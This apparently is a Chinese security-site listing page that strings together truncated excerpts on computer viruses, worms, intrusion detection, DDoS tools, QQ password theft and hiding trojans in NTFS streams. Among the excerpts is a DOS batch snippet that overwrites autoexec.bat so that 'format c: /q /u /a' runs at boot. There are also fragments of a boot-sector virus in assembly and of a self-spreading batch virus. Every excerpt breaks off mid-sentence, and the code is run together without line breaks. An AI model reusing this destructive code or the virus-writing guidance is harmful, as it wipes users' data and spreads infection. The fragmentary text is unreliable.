内网安全管理

怎样编写可执行文件型病毒可执行文件型病毒是DOS病毒中的大家族，也是病毒编写专家们用以炫耀自己的聪明才智的时候。感染处理千奇百怪，传染方案数不胜数，不亚于春秋战国时期的诸子百家争鸣，病毒大概是"病毒安全专家们"编出来的吧。理由有一：安全专家们靠处理病毒为生，有编写的能力；二：安全专家们自己会编写病毒，却

凡能够引起计算机故障，破坏计算机数据的程序统称为计算机病毒。所以从这个意义上说，蠕虫也是一种病毒！网络蠕虫病毒,作为对互联网危害严重的一种计算机程序,其破坏力和传染性不容忽视.与传统的病毒不同，蠕虫病毒以计算机为载体，以网络为攻击对象！本文中将蠕虫病毒分为针对企业网络和个人用户2类，并从企业用户和个人用

*****************************************************@echo offrem This program is dedecated to a very special person that does not want to be named.:startclsecho PLEASE WAIT WHILE PROGRAM LOADS . . .call attrib r h c:\autoexec.bat >nulecho @echo off >c:\autoexec.batecho call format c: /q /u /a

主引导区病毒的分析 引导扇区病毒，俺手里没有，这是一段DOS BOOT的分析。BOOT区病毒和他完成同样的工作，只不过每次读盘的时将自身写入磁盘。 引导过程如下：1>调整堆栈位置2>修改并用修改后的磁盘参数表来复位磁盘系统3>计算根目录表的首扇区的位置及IO.SYS的扇区位置4>读入根目录表的首扇区5>检查根目录

桌面电脑反病毒还算比较成熟。但是，IT部门们现在必须建立多层防护来保护他们的核心网络，尤其是要防止病毒通过电子邮件传播。而且，IT部门还必须在安全操作中心建立起全面的结构、监控功能，和事件反应功能。　　　　　今后的发展趋势　　　　安全管理应该包括三个功能性区域：用户管理，事件管理和配置管理。用户管理集（

介绍　　这篇文章集中讨论Linux平台上的几种基于主机的入侵检测系统。而且，我还会介绍一下如何安装这些软件包、它们有什么用处以及在什么情况下使用这些软件包。　　　　系统安全101　　这篇文章假定你已经有了一些系统安全的基本知识。而且，为了防止来自Internet的入侵也已经采取了一些基本的安全防范措施。这些措施包括

1.引言 　　　　　　2002年3月左右，Dug Song(dugsong@monkey.org)发布了一个工具fragroute，在入侵检测领域引起了相当大的震动。有关fragroute的讨论成了34月http://www.securityfocus.com和snort邮件列表的一个热点。 　　　　fragroute能够截取、修改和重写向外发送的报文，实现大部分在了Secure Networks Insertion, Ev

入侵检测是防火墙的合理补充，帮助系统对付网络攻击，扩展了系统管理员的安全管理能力（包括安全审计、监视、进攻识别和响应），提高了信息安全基础结构的完整性。它从计算机网络系统中的若干关键点收集信息，并分析这些信息，看看网络中是否有违反安全策略的行为和遭到袭击的迹象。入侵检测被认为是防火墙之后的第二道安全

4。驻留的位置位置在40H:13H，单位为KB。病毒体存在于最后的几K内存中。一个主引导记录病毒例子int13 macropushfCall dword Ptr cs:Old13Hendmjmp13 macroJmp dword Ptr cs:Old13hendm.286code segmentassume cs:code,ds:codeOrg 100hstart:org 7c00h;start:jmp short begindb 20h dup (0)db ''WN''begin:xor ax,axxor ax,a

第五步 病毒的危害　　 病毒的危害，小到个人，大到全世界，凡是在使用电脑的人无一不在受其困扰。对于那些侥幸未受病毒骚扰的人，我想在这里事先给你敲敲警钟，希望没有吓坏你。劝诫你，对于计算机病毒，最好还是能防患于未然！　　 最初对病毒理论的构思可追溯到科幻小说。在70年代美国作家雷恩出版的《P1的青春》一书中

第１章 假想的病毒程序假如您对病毒的了解象人们对尼斯湖怪的了解一样少，那么读了下面的程序，你会发现怪?一个批处理病毒你第一次用批处理编程序是在几年前？你是否想象过下面的批处理也是一个病毒？@ECHO OFFREM 文件名 VIRUS.BATREM 本病毒感染自动执行批处理文件IF DRIVE=="A:\" GOTO END123IF DRIVE=="C:\" GOTO END12

简　　介　　　　　　本文是对拒绝服务攻击工具包trinoo中主/从程序服务器的一些分析。　　　　　　Trinoo守护程序的二进制代码包最初是在一些Solaris 2.x主机中发现的，这些主机是被攻击者利用RPC服务安全漏洞"statd"、"cmsd"和"ttdbserverd"入侵的。关于这些漏洞的详细资料请参阅CERT事件记录9904：　　　　　　http://ww

1.引言 　　 　　随着计算机网络的不断发展，全球信息化已成为人类发展的大趋势。但由于计算机网络具有联结形式多样性、终端分布不均匀性和网络的开放性、互连性等特征，致使网络易受黑客、怪客、恶意软件和其他不轨的攻击，所以网上信息的安全和保密是一个至关重要的问题。对于军用的自动化指挥网络、C3I系统和银行等传输

今年10月份，DDoS攻击又开始猖獗，全球13台互联网域名解析服务器被攻破，险些造成世界互联网的灾难！ 　　　　　　拒绝服务（DoS/DDoS）攻击最早可追述到1996 　　年，在2000年发展到极致。全球包括Yahoo、CNN、eBay在内的十多个著名网站都遭遇过这种流量堵塞技术的攻击，仅Yahoo一家就造成了50万美元的损失。 　　　　　　

发现漏洞是有价值的。至今，仍有许多人相信是没有漏洞存在的，直到它们被公之于众。我们知道，漏洞是需要暴露的，但是在软件开发商被迫把问题公开的时候，他们扮演了什么角色呢？对于信息安全，我能够真正着迷的原因之一就是这个领域涉及了数量众多的不同技术。就个人电脑来讲，就有各种各样的体系结构、操作系统、设备和协

当你成功入侵一台远程主机后，你一定很想知道这台机器的主人到底是一个怎样的人吧?(如果是个可爱的妹妹说不定还可以成为好朋友呢，本人就有先例，呵呵，保密)看他的QQ聊天纪录就是一条捷径。虽然现在支持上传下载的木马倒是不少，传送单个文件还可以，但对整个目录却无能为力了。有人说，将它压缩后再传送不就可以了吗?对，

“远程破解”与“本地破解”正好相反，是指QQ盗号者通过网络盗窃远端QQ用户的密码。这种QQ破解有很多方法，如在线密码破解、登录窗口破解、邮箱破解、消息诈骗以及形形色色的QQ木马病毒等。下面就让我们一同来看看这些QQ密码的远程破解是怎么实现的。 　　1、在线密码破解　　大家知道QQ可以利用代理服务器登录，这是一种保

也许从标题就可知道本文的大概意思了，不错!今天我要讲的就是NTFS文件流如何与WINRAR联手“加壳”木马。 　　小知识:流(STREAM)是NTFS下的概念，目前只有NTFS支持流。流依附于文件而存在，可以在流中存储2进制数据，文字或者其它一些东西。每个文件可以含有多个流，当流所依附的文件被删除，流也随之消失。流的名字和文件名

在网络安全领域，随着黑客应用技术的不断“傻瓜化”，入侵检测系统IDS的地位正在逐渐增加。一个网络中，只有有效实施了IDS，才能敏锐地察觉攻击者的侵犯行为，才能防患于未然！本文对IDS的概念、行为及策略等方面内容以问答形式进行全面介绍，期望帮助管理者更快和更好地使用IDS。　　　　问：都有哪些重要的IDS系统？ 　　

孙子兵法上说，知己知彼，百战不殆。要想有效的防范黑客对我们电脑的入侵和破坏，仅仅被动的安装防火墙是显然不够的，我们更应该了解一些常见的黑客入侵手法，针对不同的方法采取不同的措施，做到有的放矢。 　　1、木马入侵 　　木马也许是广大电脑爱好者最深恶痛绝的东东了，相信不少朋友都受到过它的骚扰。木马有可能是